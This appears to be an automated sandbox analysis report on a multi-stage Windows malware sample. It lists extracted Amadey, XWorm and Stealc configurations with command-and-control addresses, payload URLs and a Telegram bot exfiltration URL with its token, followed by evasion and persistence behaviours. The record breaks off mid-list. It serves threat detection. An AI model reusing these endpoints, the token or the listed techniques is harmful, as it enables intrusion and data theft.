Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 02:10
Static task
static1
Behavioral task
behavioral1
Sample
1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe
Resource
win10v2004-20241007-en
General
-
Target
1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe
-
Size
1.8MB
-
MD5
a68bd83f0cedd6b76cca22d5853ec168
-
SHA1
ce0eae756e594d55f9a3835fb46fa82895c12c76
-
SHA256
1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125
-
SHA512
8441eb36925308b653caf7abdb34dbcb88799f14fd5fc9f11ba363206a46e83430c4caf804631b23c5dcb710da56bb691371fd5fc7a01461006387364baa85f0
-
SSDEEP
49152:44ylfSD3avYUIh0+OZiq+ZrodAR2u6EuY:47lfSDfUHwrodAR2u5F
Malware Config
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
http://176.113.115.178/Windows-Update
Extracted
http://176.113.115.178/FF/1.png
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
xworm
87.120.112.33:8398
-
Install_directory
%LocalAppData%
-
install_file
svchost.exe
-
telegram
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579
Extracted
stealc
mars
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
gurcu
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023cc3-5575.dat family_xworm behavioral2/memory/4372-6608-0x00000000009A0000-0x00000000009B8000-memory.dmp family_xworm -
Gurcu family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3252 created 5340 3252 svchost.exe 140 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6fd3a149c6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a04afe293b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 03eba3a65b.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 20 2872 powershell.exe 21 3012 powershell.exe 22 752 mshta.exe 24 4540 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1248 powershell.exe 408 powershell.exe 4932 powershell.exe 5644 powershell.exe 5376 powershell.exe 2732 powershell.exe 5836 powershell.exe 452 powershell.exe 4776 powershell.exe 6260 powershell.exe 6348 powershell.exe 2872 powershell.exe 3012 powershell.exe 4540 powershell.exe 4776 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 1 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 6844 chrome.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a04afe293b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6fd3a149c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a04afe293b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 03eba3a65b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 03eba3a65b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6fd3a149c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mig.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation a04afe293b.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation document.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk document.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk document.exe -
Executes dropped EXE 17 IoCs
pid Process 3452 skotes.exe 4848 file.exe 5332 FunnyJellyfish.exe 4828 FunnyJellyfish.tmp 4372 document.exe 5684 FunnyJellyfish.exe 2296 FunnyJellyfish.tmp 1436 skotes.exe 5340 a04afe293b.exe 6052 03eba3a65b.exe 2096 6fd3a149c6.exe 2460 3dd24738bd.exe 4756 LB31.exe 2464 Mig.exe 5336 skotes.exe 5348 service123.exe 2096 skotes.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine a04afe293b.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 03eba3a65b.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 6fd3a149c6.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe -
Loads dropped DLL 5 IoCs
pid Process 6080 regsvr32.exe 5424 regsvr32.exe 4744 regsvr32.EXE 5348 service123.exe 5784 regsvr32.EXE -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe" document.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\03eba3a65b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008082001\\03eba3a65b.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6fd3a149c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008083001\\6fd3a149c6.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3dd24738bd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008084001\\3dd24738bd.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 7000 powercfg.exe 1548 powercfg.exe 5204 powercfg.exe 6072 powercfg.exe 5208 powercfg.exe 7016 powercfg.exe 7024 powercfg.exe 7008 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023ceb-8240.dat autoit_exe -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe Mig.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\ServiceData4 svchost.exe File opened for modification C:\Windows\system32\MRT.exe LB31.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 3604 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe 3452 skotes.exe 1436 skotes.exe 5340 a04afe293b.exe 6052 03eba3a65b.exe 2096 6fd3a149c6.exe 5336 skotes.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 3012 set thread context of 3728 3012 powershell.exe 101 PID 4756 set thread context of 2872 4756 LB31.exe 189 PID 2464 set thread context of 7040 2464 Mig.exe 221 PID 2464 set thread context of 7068 2464 Mig.exe 222 PID 2464 set thread context of 7164 2464 Mig.exe 226 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4748 sc.exe 6912 sc.exe 1624 sc.exe 3712 sc.exe 4684 sc.exe 6680 sc.exe 4744 sc.exe 3612 sc.exe 2520 sc.exe 2372 sc.exe 3824 sc.exe 6772 sc.exe 6956 sc.exe 6820 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2056 5340 WerFault.exe 140 -
System Location Discovery: System Language Discovery 1 TTPs 21 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a04afe293b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3dd24738bd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 03eba3a65b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6fd3a149c6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe -
Checks processor information in registry 2 TTPs 19 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString a04afe293b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 a04afe293b.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5612 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2612 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 4564 taskkill.exe 4516 taskkill.exe 5860 taskkill.exe 3352 taskkill.exe 1624 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 svchost.exe -
Modifies data under HKEY_USERS 60 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key deleted 